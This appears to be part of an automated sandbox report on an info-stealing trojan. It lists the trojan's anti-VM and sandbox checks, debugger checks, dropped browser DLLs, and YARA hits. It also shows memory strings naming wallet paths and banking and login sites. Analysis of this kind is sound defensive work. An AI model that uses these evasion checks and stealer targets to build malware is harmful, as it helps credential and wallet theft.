Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: 2.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe.c6faf0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe.c6faf0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe.c40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2515562170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2243074417.0000000000C6F000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe PID: 4712, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 4788, type: MEMORYSTR

Country aware sample found (crashes after keyboard check)

Source: c:\users\user\desktop\securiteinfo.com.trojan.downloader47.43477.29852.19410.exe

Event Logs and Signature results: Application crash and keyboard check

Found evasive API chain checking for user administrative privileges

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Check user administrative privileges: IsUserAndAdmin, DecisionNode

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe, MSBuild.exe	Binary or memory string: DIR_WATCH.DLL
Source: SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe, MSBuild.exe	Binary or memory string: SBIEDLL.DLL
Source: SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe, MSBuild.exe	Binary or memory string: API_LOG.DLL
Source: MSBuild.exe, 00000002.00000002.2515562170.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: INMPM20IXQUGN9:-?5(\C!7%{->^WALLET_PATHSOFTWARE\MONERO-PROJECT\MONERO-CORE.KEYS\MONERO\WALLET.KEYS\\\.\\...\\\\\\\\\\\\HAL9THJOHNDOEDISPLAYAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL23:02:2823:02:2823:02:2823:02:2823:02:2823:02:28DELAYS.TMP%S%SNTDLL.DLL

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: OpenInputDesktop,SetThreadDesktop,GetCursorPos,GetCursorPos,Sleep,Sleep,GetCursorPos,Sleep,Sleep,GetCursorPos,

2_2_0040180D

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\mozglue[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\msvcp140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\vcruntime140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\nss3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\sql[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\freebl3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe	API coverage: 1.2 %
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	API coverage: 6.8 %
Source: C:\ProgramData\AKEGIIJDGH.exe	API coverage: 1.2 %

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5012	Thread sleep time: -30000s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe TID: 5516	Thread sleep count: 76 > 30			Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 2_2_00410DB0 GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 00410EC3h

2_2_00410DB0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe	Code function: 0_2_00C5BFD4 FindFirstFileExW,	0_2_00C5BFD4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_00416013 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	2_2_00416013
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_0041547D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	2_2_0041547D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_00409CF1 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	2_2_00409CF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_00414D08 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,strtok_s,FindNextFileA,FindClose,	2_2_00414D08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_00401D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	2_2_00401D80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_0040D59B FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	2_2_0040D59B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_0040B5B4 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	2_2_0040B5B4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_0040BF22 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,	2_2_0040BF22
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_0040B914 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	2_2_0040B914
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_00415B4D GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,	2_2_00415B4D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_0040CD0C wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	2_2_0040CD0C
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 11_2_000EBFD4 FindFirstFileExW,	11_2_000EBFD4

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 2_2_00415182 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,

2_2_00415182

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 2_2_00410F8F GetSystemInfo,wsprintfA,

2_2_00410F8F

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: Amcache.hve.5.dr	Binary or memory string: VMware
Source: MSBuild.exe, 0000000D.00000002.2620262148.0000000000F5D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW@\|
Source: KKECBF.2.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: KKECBF.2.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: KKECBF.2.dr	Binary or memory string: global block list test formVMware20,11696428655
Source: Amcache.hve.5.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: MSBuild.exe, 00000002.00000002.2517585992.0000000001547000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2517585992.00000000014E8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2620474258.0000000000F85000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: KKECBF.2.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: Amcache.hve.5.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: KKECBF.2.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: Amcache.hve.5.dr	Binary or memory string: vmci.sys
Source: KKECBF.2.dr	Binary or memory string: AMC password management pageVMware20,11696428655
Source: KKECBF.2.dr	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: KKECBF.2.dr	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: KKECBF.2.dr	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: KKECBF.2.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: Amcache.hve.5.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.5.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.5.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: MSBuild.exe, 00000002.00000002.2517585992.00000000014E8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: KKECBF.2.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: Amcache.hve.5.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.5.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.5.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.5.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.5.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: KKECBF.2.dr	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: KKECBF.2.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: Amcache.hve.5.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: KKECBF.2.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.5.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.5.dr	Binary or memory string: VMware, Inc.
Source: KKECBF.2.dr	Binary or memory string: discord.comVMware20,11696428655f
Source: Amcache.hve.5.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.5.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.5.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: KKECBF.2.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: Amcache.hve.5.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: KKECBF.2.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: KKECBF.2.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: KKECBF.2.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: KKECBF.2.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: Amcache.hve.5.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: KKECBF.2.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: KKECBF.2.dr	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: KKECBF.2.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: Amcache.hve.5.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: KKECBF.2.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: KKECBF.2.dr	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: KKECBF.2.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: KKECBF.2.dr	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: Amcache.hve.5.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.5.dr	Binary or memory string: vmci.syshbin`
Source: KKECBF.2.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: Amcache.hve.5.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: KKECBF.2.dr	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: Amcache.hve.5.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: KKECBF.2.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: Amcache.hve.5.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: KKECBF.2.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	API call chain: ExitProcess graph end node	graph_2-91245
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	API call chain: ExitProcess graph end node	graph_2-91261
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	API call chain: ExitProcess graph end node	graph_2-92590

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe	Process queried: DebugPort	Jump to behavior
Source: C:\ProgramData\AKEGIIJDGH.exe	Process queried: DebugPort	Jump to behavior
Source: C:\ProgramData\AKEGIIJDGH.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 13_2_00443090 LdrInitializeThunk,

13_2_00443090

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe

Code function: 0_2_00C4ED09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00C4ED09

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

2_2_00418ADE

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe	Code function: 0_2_00C420FE mov edi, dword ptr fs:[00000030h]	0_2_00C420FE
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe	Code function: 0_2_00C70392 mov eax, dword ptr fs:[00000030h]	0_2_00C70392
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe	Code function: 0_2_00C7039D mov eax, dword ptr fs:[00000030h]	0_2_00C7039D
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe	Code function: 0_2_00C7037A mov eax, dword ptr fs:[00000030h]	0_2_00C7037A
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe	Code function: 0_2_00C87616 mov eax, dword ptr fs:[00000030h]	0_2_00C87616
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe	Code function: 0_2_00C52A2B mov ecx, dword ptr fs:[00000030h]	0_2_00C52A2B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe	Code function: 0_2_00C5CB61 mov eax, dword ptr fs:[00000030h]	0_2_00C5CB61
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_004014AD mov eax, dword ptr fs:[00000030h]	2_2_004014AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_0040148A mov eax, dword ptr fs:[00000030h]	2_2_0040148A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_004014A2 mov eax, dword ptr fs:[00000030h]	2_2_004014A2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_00418725 mov eax, dword ptr fs:[00000030h]	2_2_00418725
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_00418726 mov eax, dword ptr fs:[00000030h]	2_2_00418726
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 11_2_000D20FE mov edi, dword ptr fs:[00000030h]	11_2_000D20FE
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 11_2_000E2A2B mov ecx, dword ptr fs:[00000030h]	11_2_000E2A2B
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 11_2_000ECB61 mov eax, dword ptr fs:[00000030h]	11_2_000ECB61

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe

Code function: 0_2_00C5F163 GetProcessHeap,

0_2_00C5F163

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe	Code function: 0_2_00C49148 SetUnhandledExceptionFilter,	0_2_00C49148
